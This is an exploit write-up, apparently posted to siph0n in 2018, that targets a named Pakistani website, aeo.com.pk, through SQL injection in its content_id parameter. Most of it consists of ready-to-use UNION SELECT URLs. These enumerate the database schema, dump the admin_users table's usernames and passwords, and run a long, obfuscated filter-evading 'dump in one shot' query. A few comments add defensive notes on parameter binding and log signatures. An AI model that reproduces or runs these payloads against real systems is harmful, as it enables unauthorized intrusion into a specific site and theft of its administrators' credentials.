|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
 
-----------------------------------------------------------------------------------------------
Site: 
-----------------------------------------------------------------------------------------------
######################
# Exploit Title : AEO.com SQL Injection
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : http://aeo.com.pk
# Tested On : Windows 7 / Kali Linux / Mozilla Firefox
######################
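# Target: http://aeo.com.pk/site/contents.php?content_id=-32'
# Injectable parameter: content_id. That a quote in the value alters the query suggests the parameter is concatenated into the SQL string; the fix is to bind it as a query parameter and accept only integers.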

# Data: table and column names of the current database, read from information_schema.columns
http://aeo.com.pk/site/contents.php?content_id=-32' UNION SELECT 1,2,3,group_concat('<br>',table_name,0x3a,column_name),5,6,7,8 from information_schema.columns where table_schema=database()--+

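# Credentials: rows of the admin_users table (user_id, username, password, encrypt_paswrd, admin_type).
# The table has both a password and an encrypt_paswrd column, so passwords may be stored in recoverable form; every account in this table should be treated as compromised and rotated.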
http://aeo.com.pk/site/contents.php
?content_id=-32' UNION SELECT 1,2,3,group_concat('<br>',user_id,0x3a,username,0x3a,password,0x3a,encrypt_paswrd,0x3a,admin_type),5,6,7,8 from admin_users--+

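# DIOS (dump in one shot) query: a single request that returns the MySQL version, the current database and the database user, followed by every table and column name in the current schema.
# The versioned comments (/*!...*/) and mixed-case keywords are there to evade keyword filters; their presence in a query string is a usable signature when reviewing request logs.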
http://aeo.com.pk/site/contents.php?content_id=-32' UNION SELECT 1,2,3,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:[email protected]%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:[email protected]_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,5,6,7,8 from information_schema.columns where table_schema=database()--+


# siph0n [2018-05-17]